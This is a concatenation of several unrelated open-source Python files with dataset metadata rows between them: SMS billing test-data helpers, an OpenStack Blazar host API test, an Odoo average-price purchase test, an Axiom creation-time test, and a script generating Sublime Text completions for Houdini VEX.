return str(random.choice(country_codes)) + str(random.randint(10**9, 10**10 - 1))
@unit_testing_only
def arbitrary_domain(length=25):
return ''.join(random.choice(string.ascii_lowercase) for i in range(length))
@unit_testing_only
def arbitrary_fees_by_direction():
fees = {}
for direction in DIRECTIONS:
fees[direction] = arbitrary_fee()
return fees
@unit_testing_only
def arbitrary_fees_by_direction_and_domain():
domains = [arbitrary_domain() for i in range(10)]
fees = {}
for direction in DIRECTIONS:
fees_by_domain = {}
for domain in domains:
fees_by_domain[domain] = arbitrary_fee()
fees[direction] = fees_by_domain
return fees
@unit_testing_only
def arbitrary_fees_by_direction_and_backend():
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_backend[backend.get_api_id()] = arbitrary_fee()
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_fees_by_country():
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_country = {}
for country in TEST_COUNTRY_CODES:
fees_by_country[country] = arbitrary_fee()
fees_by_backend[backend.get_api_id()] = fees_by_country
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_fees_by_backend_instance(backend_ids):
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_backend[backend.get_api_id()] = (backend_ids[backend.get_api_id()], arbitrary_fee())
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_fees_by_all(backend_ids):
fees = {}
for direction in DIRECTIONS:
fees_by_backend = {}
for backend in _available_gateway_fee_backends():
fees_by_country = {}
for country in TEST_COUNTRY_CODES:
fees_by_country[country] = (backend_ids[backend.get_api_id()], arbitrary_fee())
fees_by_backend[backend.get_api_id()] = fees_by_country
fees[direction] = fees_by_backend
return fees
@unit_testing_only
def arbitrary_backend_ids():
backend_ids = {}
for backend in _available_gateway_fee_backends():
backend_instance = data_gen.arbitrary_unique_name("back")
backend_ids[backend.get_api_id()] = backend_instance
sms_backend = backend()
sms_backend.hq_api_id = backend.get_api_id()
sms_backend.couch_id = backend_instance
sms_backend.name = backend_instance
sms_backend.is_global = True
sms_backend.save()
return backend_ids
@unit_testing_only
def arbitrary_messages_by_backend_and_direction(backend_ids,
phone_number=None,
domain=None,
directions=None):
phone_number = phone_number or TEST_NUMBER
domain = domain or TEST_DOMAIN
directions = directions or DIRECTIONS
messages = []
for api_id, instance_id in backend_ids.items():
for direction in directions:
sms_log = SMS(
direction=direction,
phone_number=phone_number,
domain=domain,
backend_api=api_id,
backend_id=instance_id,
backend_message_id=uuid.uuid4().hex,
text=arbitrary_message(),
date=datetime.datetime.utcnow()
)
sms_log.save()
messages.append(sms_log)
return messages
@unit_testing_only
def arbitrary_currency():
return Currency.objects.get_or_create(
code='OTH',
defaults={
'rate_to_default': Decimal('%5.f' % random.uniform(0.5, 2.0)),
},
)[0]
@unit_testing_only
def arbitrary_phone_numbers_and_prefixes(country_code_and_prefixes):
country_code_to_prefixes = {}
for country_code, prefix in country_code_and_prefixes:
if country_code not in country_code_to_prefixes:
country_code_to_prefixes[country_code] = []
country_code_to_prefixes[country_code].append(prefix)
for country_code, prefix in country_code_and_prefixes:
remainder_len = 10 - len(prefix)
def _get_national_number():
return prefix + str(random.randint(
(1 if prefix else 2) * (10 ** (remainder_len - 1)),
(10 ** remainder_len) - 1
))
while True:
national_number = _get_national_number()
if not any(
national_number.startswith(another_prefix) and another_prefix.startswith(prefix)
for another_prefix in country_code_to_prefixes[country_code]
if another_prefix and another_prefix != prefix
):
yield (
country_code + national_number,
prefix
)
break
@unit_testing_only
def arbitrary_sms_billables_for_domain(domain, message_month_date, num_sms, direction=None, multipart_count=1):
direction = direction or random.choice(DIRECTIONS)
gateway_fee = SmsGatewayFee.create_new('MACH', direction, Decimal(0.5))
usage_fee = SmsUsageFee.create_new(direction, Decimal(0.25))
_, last_day_message = calendar.monthrange(message_month_date.year, message_month_date.month)
billables = []
for _ in range(0, num_sms):
sms_billable = SmsBillable(
gateway_fee=gateway_fee,
usage_fee=usage_fee,
log_id=data_gen.arbitrary_unique_name()[:50],
phone_number=data_gen.random_phonenumber(),
domain=domain,
direction=direction,
date_sent=datetime.date(message_month_date.year, message_month_date.month,
random.randint(1, last_day_message)),
multipart_count=multipart_count,
)
sms_billable.save()
billables.append(sms_billable)
return billables
|
bsd-3-clause
| 2,373,299,158,017,722,400 | 34.431973 | 117 | 0.633388 | false |
openstack/blazar
|
blazar/tests/api/v1/oshosts/test_v1_0.py
|
1
|
10633
|
# Copyright (c) 2013 Bull.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ddt
import flask
from oslo_utils import uuidutils
from testtools import matchers
from oslo_middleware import request_id as id
from blazar.api import context as api_context
from blazar.api.v1 import api_version_request
from blazar.api.v1.oshosts import service as service_api
from blazar.api.v1.oshosts import v1_0 as hosts_api_v1_0
from blazar.api.v1 import request_id
from blazar.api.v1 import request_log
from blazar import context
from blazar import tests
def make_app():
"""App builder (wsgi).
Entry point for Blazar REST API server.
"""
app = flask.Flask('blazar.api')
app.register_blueprint(hosts_api_v1_0.rest, url_prefix='/v1')
app.wsgi_app = request_id.BlazarReqIdMiddleware(app.wsgi_app)
app.wsgi_app = request_log.RequestLog(app.wsgi_app)
return app
def fake_computehost(**kw):
return {
'id': kw.get('id', '1'),
'hypervisor_hostname': kw.get('hypervisor_hostname', 'host01'),
'hypervisor_type': kw.get('hypervisor_type', 'QEMU'),
'vcpus': kw.get('vcpus', 1),
'hypervisor_version': kw.get('hypervisor_version', 1000000),
'trust_id': kw.get('trust_id',
'35b17138-b364-4e6a-a131-8f3099c5be68'),
'memory_mb': kw.get('memory_mb', 8192),
'local_gb': kw.get('local_gb', 50),
'cpu_info': kw.get('cpu_info',
"{\"vendor\": \"Intel\", \"model\": \"qemu32\", "
"\"arch\": \"x86_64\", \"features\": [],"
" \"topology\": {\"cores\": 1}}",
),
'extra_capas': kw.get('extra_capas',
{'vgpus': 2, 'fruits': 'bananas'})
}
def fake_computehost_request_body(include=None, **kw):
computehost_body = fake_computehost(**kw)
computehost_body['name'] = kw.get('name',
computehost_body['hypervisor_hostname'])
default_include = set(['name', 'extra_capas'])
include = include or set()
include |= default_include
return dict((key, computehost_body[key])
for key in computehost_body if key in include)
@ddt.ddt
class OsHostAPITestCase(tests.TestCase):
def setUp(self):
super(OsHostAPITestCase, self).setUp()
self.app = make_app()
self.headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation 1.0'}
self.host_id = str('1')
self.mock_ctx = self.patch(api_context, 'ctx_from_headers')
self.mock_ctx.return_value = context.BlazarContext(
user_id='fake', project_id='fake', roles=['member'])
self.get_computehosts = self.patch(service_api.API,
'get_computehosts')
self.create_computehost = self.patch(service_api.API,
'create_computehost')
self.get_computehost = self.patch(service_api.API, 'get_computehost')
self.update_computehost = self.patch(service_api.API,
'update_computehost')
self.delete_computehost = self.patch(service_api.API,
'delete_computehost')
self.list_allocations = self.patch(service_api.API,
'list_allocations')
self.get_allocations = self.patch(service_api.API, 'get_allocations')
def _assert_response(self, actual_resp, expected_status_code,
expected_resp_body, key='host',
expected_api_version='reservation 1.0'):
res_id = actual_resp.headers.get(id.HTTP_RESP_HEADER_REQUEST_ID)
api_version = actual_resp.headers.get(
api_version_request.API_VERSION_REQUEST_HEADER)
self.assertIn(id.HTTP_RESP_HEADER_REQUEST_ID,
actual_resp.headers)
self.assertIn(api_version_request.API_VERSION_REQUEST_HEADER,
actual_resp.headers)
self.assertIn(api_version_request.VARY_HEADER, actual_resp.headers)
self.assertThat(res_id, matchers.StartsWith('req-'))
self.assertEqual(expected_status_code, actual_resp.status_code)
self.assertEqual(expected_resp_body, actual_resp.get_json()[key])
self.assertEqual(expected_api_version, api_version)
self.assertEqual('OpenStack-API-Version', actual_resp.headers.get(
api_version_request.VARY_HEADER))
def test_list(self):
with self.app.test_client() as c:
self.get_computehosts.return_value = []
res = c.get('/v1', headers=self.headers)
self._assert_response(res, 200, [], key='hosts')
def test_list_with_non_acceptable_version(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation 1.2'}
with self.app.test_client() as c:
res = c.get('/v1', headers=headers)
self.assertEqual(406, res.status_code)
def test_create(self):
with self.app.test_client() as c:
self.create_computehost.return_value = fake_computehost(
id=self.host_id)
res = c.post('/v1', json=fake_computehost_request_body(
id=self.host_id), headers=self.headers)
self._assert_response(res, 201, fake_computehost(
id=self.host_id))
def test_create_with_bad_api_version(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation 1.a'}
with self.app.test_client() as c:
res = c.post('/v1', json=fake_computehost_request_body(
id=self.host_id), headers=headers)
self.assertEqual(400, res.status_code)
def test_get(self):
with self.app.test_client() as c:
self.get_computehost.return_value = fake_computehost(
id=self.host_id)
res = c.get('/v1/{0}'.format(self.host_id), headers=self.headers)
self._assert_response(res, 200, fake_computehost(id=self.host_id))
def test_get_with_latest_api_version(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': 'reservation latest'}
with self.app.test_client() as c:
self.get_computehost.return_value = fake_computehost(
id=self.host_id)
res = c.get('/v1/{0}'.format(self.host_id), headers=headers)
self._assert_response(res, 200, fake_computehost(id=self.host_id),
expected_api_version='reservation 1.0')
def test_update(self):
headers = {'Accept': 'application/json'}
with self.app.test_client() as c:
self.fake_computehost = fake_computehost(id=self.host_id,
name='updated')
self.fake_computehost_body = fake_computehost_request_body(
id=self.host_id,
name='updated'
)
self.update_computehost.return_value = self.fake_computehost
res = c.put('/v1/{0}'.format(self.host_id),
json=self.fake_computehost_body, headers=headers)
self._assert_response(res, 200, self.fake_computehost, 'host')
def test_update_with_no_service_type_in_header(self):
headers = {'Accept': 'application/json',
'OpenStack-API-Version': '1.0'}
with self.app.test_client() as c:
self.fake_computehost = fake_computehost(id=self.host_id,
name='updated')
self.fake_computehost_body = fake_computehost_request_body(
id=self.host_id,
name='updated'
)
self.update_computehost.return_value = self.fake_computehost
res = c.put('/v1/{0}'.format(self.host_id),
json=self.fake_computehost_body, headers=headers)
self._assert_response(res, 200, self.fake_computehost, 'host')
def test_delete(self):
with self.app.test_client() as c:
self.get_computehosts.return_value = fake_computehost(
id=self.host_id)
res = c.delete('/v1/{0}'.format(self.host_id),
headers=self.headers)
res_id = res.headers.get(id.HTTP_RESP_HEADER_REQUEST_ID)
self.assertEqual(204, res.status_code)
self.assertIn(id.HTTP_RESP_HEADER_REQUEST_ID, res.headers)
self.assertThat(res_id, matchers.StartsWith('req-'))
def test_allocation_list(self):
with self.app.test_client() as c:
self.list_allocations.return_value = []
res = c.get('/v1/allocations', headers=self.headers)
self._assert_response(res, 200, [], key='allocations')
def test_allocation_get(self):
with self.app.test_client() as c:
self.get_allocations.return_value = {}
res = c.get('/v1/{0}/allocation'.format(self.host_id),
headers=self.headers)
self._assert_response(res, 200, {}, key='allocation')
@ddt.data({'lease_id': str(uuidutils.generate_uuid()),
'reservation_id': str(uuidutils.generate_uuid())})
def test_allocation_list_with_query_params(self, query_params):
with self.app.test_client() as c:
res = c.get('/v1/allocations?{0}'.format(query_params),
headers=self.headers)
self._assert_response(res, 200, {}, key='allocations')
@ddt.data({'lease_id': str(uuidutils.generate_uuid()),
'reservation_id': str(uuidutils.generate_uuid())})
def test_allocation_get_with_query_params(self, query_params):
with self.app.test_client() as c:
res = c.get('/v1/{0}/allocation?{1}'.format(
self.host_id, query_params), headers=self.headers)
self._assert_response(res, 200, {}, key='allocation')
|
apache-2.0
| -7,405,516,285,143,847,000 | 43.48954 | 78 | 0.583373 | false |
maxive/erp
|
addons/purchase/tests/test_average_price.py
|
1
|
6253
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import time
from .common import TestPurchase
class TestAveragePrice(TestPurchase):
def test_00_average_price(self):
""" Testcase for average price computation"""
self._load('account', 'test', 'account_minimal_test.xml')
self._load('stock_account', 'test', 'stock_valuation_account.xml')
# Set a product as using average price.
product_icecream = self.env['product.product'].create({
'default_code': 'AVG',
'name': 'Average Ice Cream',
'type': 'product',
'categ_id': self.env.ref('product.product_category_1').id,
'list_price': 100.0,
'standard_price': 60.0,
'uom_id': self.env.ref('uom.product_uom_kgm').id,
'uom_po_id': self.env.ref('uom.product_uom_kgm').id,
'cost_method': 'average',
'valuation': 'real_time',
'property_stock_account_input': self.ref('purchase.o_expense'),
'property_stock_account_output': self.ref('purchase.o_income'),
'supplier_taxes_id': [],
'description': 'FIFO Ice Cream',
})
# I create a draft Purchase Order for first incoming shipment for 10 pieces at 60€
purchase_order_1 = self.env['purchase.order'].create({
'partner_id': self.env.ref('base.res_partner_3').id,
'order_line': [(0, 0, {
'name': 'Average Ice Cream',
'product_id': product_icecream.id,
'product_qty': 10.0,
'product_uom': self.env.ref('uom.product_uom_kgm').id,
'price_unit': 60.0,
'date_planned': time.strftime('%Y-%m-%d'),
})]
})
# Confirm the first purchase order
purchase_order_1.button_confirm()
# Check the "Approved" status of purchase order 1
self.assertEqual(purchase_order_1.state, 'purchase', "Wrong state of purchase order!")
# Process the reception of purchase order 1
picking = purchase_order_1.picking_ids[0]
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, picking.id)]}).process()
# Check the average_price of the product (average icecream).
self.assertEqual(product_icecream.qty_available, 10.0, 'Wrong quantity in stock after first reception')
self.assertEqual(product_icecream.standard_price, 60.0, 'Standard price should be the price of the first reception!')
# I create a draft Purchase Order for second incoming shipment for 30 pieces at 80€
purchase_order_2 = self.env['purchase.order'].create({
'partner_id': self.env.ref('base.res_partner_3').id,
'order_line': [(0, 0, {
'name': product_icecream.name,
'product_id': product_icecream.id,
'product_qty': 30.0,
'product_uom': self.env.ref('uom.product_uom_kgm').id,
'price_unit': 80.0,
'date_planned': time.strftime('%Y-%m-%d'),
})]
})
# Confirm the second purchase order
purchase_order_2.button_confirm()
# Process the reception of purchase order 2
picking = purchase_order_2.picking_ids[0]
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, picking.id)]}).process()
# Check the standard price
self.assertEqual(product_icecream.standard_price, 75.0, 'After second reception, we should have an average price of 75.0 on the product')
# Create picking to send some goods
outgoing_shipment = self.env['stock.picking'].create({
'picking_type_id': self.env.ref('stock.picking_type_out').id,
'location_id': self.env.ref('stock.stock_location_stock').id,
'location_dest_id': self.env.ref('stock.stock_location_customers').id,
'move_lines': [(0, 0, {
'name': 'outgoing_shipment_avg_move',
'product_id': product_icecream.id,
'product_uom_qty': 20.0,
'product_uom': self.env.ref('uom.product_uom_kgm').id,
'location_id': self.env.ref('stock.stock_location_stock').id,
'location_dest_id': self.env.ref('stock.stock_location_customers').id})]
})
# Assign this outgoing shipment and process the delivery
outgoing_shipment.action_assign()
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, outgoing_shipment.id)]}).process()
# Check the average price (60 * 10 + 30 * 80) / 40 = 75.0€ did not change
self.assertEqual(product_icecream.standard_price, 75.0, 'Average price should not have changed with outgoing picking!')
self.assertEqual(product_icecream.qty_available, 20.0, 'Pieces were not picked correctly as the quantity on hand is wrong')
# Make a new purchase order with 500 g Average Ice Cream at a price of 0.2€/g
purchase_order_3 = self.env['purchase.order'].create({
'partner_id': self.env.ref('base.res_partner_3').id,
'order_line': [(0, 0, {
'name': product_icecream.name,
'product_id': product_icecream.id,
'product_qty': 500.0,
'product_uom': self.ref('uom.product_uom_gram'),
'price_unit': 0.2,
'date_planned': time.strftime('%Y-%m-%d'),
})]
})
# Confirm the first purchase order
purchase_order_3.button_confirm()
# Process the reception of purchase order 3 in grams
picking = purchase_order_3.picking_ids[0]
self.env['stock.immediate.transfer'].create({'pick_ids': [(4, picking.id)]}).process()
# Check price is (75.0 * 20 + 200*0.5) / 20.5 = 78.04878€
self.assertEqual(product_icecream.qty_available, 20.5, 'Reception of purchase order in grams leads to wrong quantity in stock')
self.assertEqual(round(product_icecream.standard_price, 2), 78.05,
'Standard price as average price of third reception with other UoM incorrect! Got %s instead of 78.05' % (round(product_icecream.standard_price, 2)))
|
agpl-3.0
| -4,236,642,677,800,138,000 | 47.773438 | 161 | 0.591062 | false |
lvh/maxims
|
maxims/test/test_creation.py
|
1
|
2711
|
from axiom import attributes, errors, item, store
from datetime import timedelta
from epsilon import extime
from twisted.trial import unittest
from maxims import creation
class SimpleItem(item.Item):
activations = attributes.integer(default=0)
def activate(self):
self.activations += 1
def _getCreationTime(item):
"""
Gets the _CreationTime object for the given item.
The difference between this and ``creationTime`` is that this exposes
the ``_CreationTime`` object, whereas the latter only shows the creation
time.
"""
CT = creation._CreationTime
return item.store.findUnique(CT, CT.createdItem == item)
class _CreationTimeTests(object):
"""
Assertions for creation time tests.
"""
_DELTA = timedelta(seconds=.1)
def assertCreationTimeStored(self, item):
cT = _getCreationTime(item)
self.assertApproximates(cT.timestamp, extime.Time(), self._DELTA)
self.assertIdentical(creation.creationTime(item), cT.timestamp)
def assertCreationTimeNotStored(self, item):
self.assertRaises(errors.ItemNotFound, creation.creationTime, item)
class LogCreationTests(_CreationTimeTests, unittest.TestCase):
"""
Tests for the function that logs the creation of new objects.
"""
def test_simple(self):
simpleItem = SimpleItem(store=store.Store())
self.assertCreationTimeNotStored(simpleItem)
creation.logCreation(simpleItem)
self.assertCreationTimeStored(simpleItem)
def test_multipleActivations(self):
"""
Tests that the time does not get updated when the item gets
activated twice.
"""
testStore = store.Store()
simpleItem = SimpleItem(store=testStore)
creation.logCreation(simpleItem)
old = _getCreationTime(simpleItem).timestamp
testStore.objectCache.uncache(simpleItem.storeID, simpleItem)
testStore.getItemByID(simpleItem.storeID)
new = _getCreationTime(simpleItem).timestamp
self.assertEqual(old, new)
@creation.creationLogged
class CreationLoggedItem(item.Item):
"""
An item that automatically has its creation logged when it is added to a
store.
"""
dummy = attributes.boolean()
class CreationLoggedTests(_CreationTimeTests, unittest.TestCase):
def test_simple(self):
"""
Tests that an item marked with the decorator gets its creation logged
when it is added to a store.
"""
loggedItem = CreationLoggedItem()
# assertCreationTimeNotStored makes no sense here: store is None
loggedItem.store = store.Store()
self.assertCreationTimeStored(loggedItem)
|
isc
| -3,160,057,430,640,151,600 | 26.383838 | 77 | 0.692733 | false |
WhileRomeBurns/VEX_Syntax
|
src/vcc_utils.py
|
1
|
4987
|
import os
import sys
import re
import subprocess
import json
VCC_PATH = 'C:/Program Files/Side Effects Software/Houdini 16.0.600/bin/vcc.exe'
SYN_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), '..')
COMP_PATH = os.path.join(SYN_PATH, 'VEX.sublime-completions')
FUNC_PATH = os.path.join(os.path.join(SYN_PATH, 'syntax_lists'), 'VexFunctions.txt')
def contexts(vcc_path=VCC_PATH):
"""Return a sorted list of all vex contexts."""
ctxs = subprocess.check_output([vcc_path, '-X'])
ctxs = ctxs.decode('ascii').split('\n')
return sorted([x for x in ctxs if x != '' and x != None])
def context_functions(context, vcc_path=VCC_PATH, as_set=False):
"""Return the sorted list of all function names for a vex context."""
ctx_info = subprocess.check_output([vcc_path, '-X', context])
ctx_info = ctx_info.decode('ascii')
funcs = set()
for f in re.findall('\w+\(', ctx_info):
if len(f) > 1:
funcs.add(f[:-1])
if as_set:
return funcs
else:
return sorted(list(funcs))
def context_function_signatures(context, vcc_path=VCC_PATH):
ctx_info = subprocess.check_output([vcc_path, '-X', context])
ctx_info = ctx_info.decode('ascii')
sigs = []
for s in re.findall('(\w+(\[\])?) (\w+)\((.*)\)', ctx_info):
sig_str = '%s %s(%s)' % (s[0], s[2], s[3])
if s[3] == 'void':
hint_str = ''
else:
hint_str = '%s\n(%s)' % (s[0], s[3].rstrip().lstrip().rstrip(';'))
args = [x.strip() for x in s[3].split(';')]
sigs.append({'returns':s[0], 'name':s[2], 'ctx':context, 'args':args, 'str':sig_str,
'hint':hint_str})
return sigs
def all_functions(vcc_path=VCC_PATH, write_functions=True, function_path=FUNC_PATH):
"""Returns a sorted list of all vex functions in all contexts."""
all_funcs = set()
for ctx in contexts():
all_funcs.update(context_functions(ctx, as_set=True))
all_funcs_sorted = sorted(all_funcs)
if write_functions:
with open(function_path, 'w') as f:
for func in all_funcs_sorted:
f.write('{}\n'.format(func))
return all_funcs_sorted
def all_function_signatures(vcc_path=VCC_PATH):
all_sigs = []
sig_strs = set()
for ctx in contexts():
ctx_sigs = context_function_signatures(ctx)
for ctx_sig in ctx_sigs:
if ctx_sig['str'] not in sig_strs:
sig_strs.add(ctx_sig['str'])
all_sigs.append(ctx_sig)
return all_sigs
def generate_simple_completions(sublime_completion_path=COMP_PATH):
"""Converts the function signitures generated by vcc into SublimeText compatable completion
JSON files."""
completions = []
for name in all_functions():
completions.append({'trigger' : ('%s\tfunction' % name),
'contents': ('%s(${1})' % name)})
data = {'scope': 'source.vex', 'completions': completions}
with open(sublime_completion_path, 'w') as f:
json.dump(data, f, sort_keys=True, indent=4, separators=(',', ': '))
def generate_completions(sublime_completion_path=COMP_PATH):
"""Converts the function signitures generated by vcc into SublimeText compatable completion
JSON files."""
completions = []
for sig in all_function_signatures():
if len(sig['args']) == 1 and sig['args'][0] == 'void':
comp_arg_fmt = ''
else:
comp_arg_fmt = ''
comp_arg_fmt_no_varadic = ''
c = 1
for arg_type in sig['args']:
comp_arg_fmt += ('${%d:%s}, ' % (c, arg_type))
c += 1
if arg_type != '...':
comp_arg_fmt_no_varadic = comp_arg_fmt
comp_arg_fmt = comp_arg_fmt[:-2] # stripping ', ' before closing parenthesis
comp_arg_fmt_no_varadic = comp_arg_fmt_no_varadic[:-2]
# in the varadic case, we'll generate two completions - one with and one without the
# varadic argument elipsis
if sig['args'][-1] == '...':
new_hint = sig['hint'][:-4]
new_hint = new_hint.rstrip().rstrip(';')
new_hint += ')'
completions.append({'trigger' : ('%s\t%s' % (sig['name'], new_hint)),
'contents': ('%s(%s)' % (sig['name'], comp_arg_fmt_no_varadic))})
completions.append({'trigger' : ('%s\t%s' % (sig['name'], sig['hint'])),
'contents': ('%s(%s)' % (sig['name'], comp_arg_fmt))})
data = {'scope': 'source.vex', 'completions': completions}
with open(sublime_completion_path, 'w') as f:
json.dump(data, f, sort_keys=True, indent=4, separators=(',', ': '))
if __name__ == '__main__':
if len(sys.argv) < 2:
generate_simple_completions()
elif len(sys.argv) == 2:
generate_simple_completions(sys.argv[1])
else:
raise Exception('To many arguments.')
|
mit
| 7,458,347,255,674,271,000 | 33.393103 | 97 | 0.560056 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.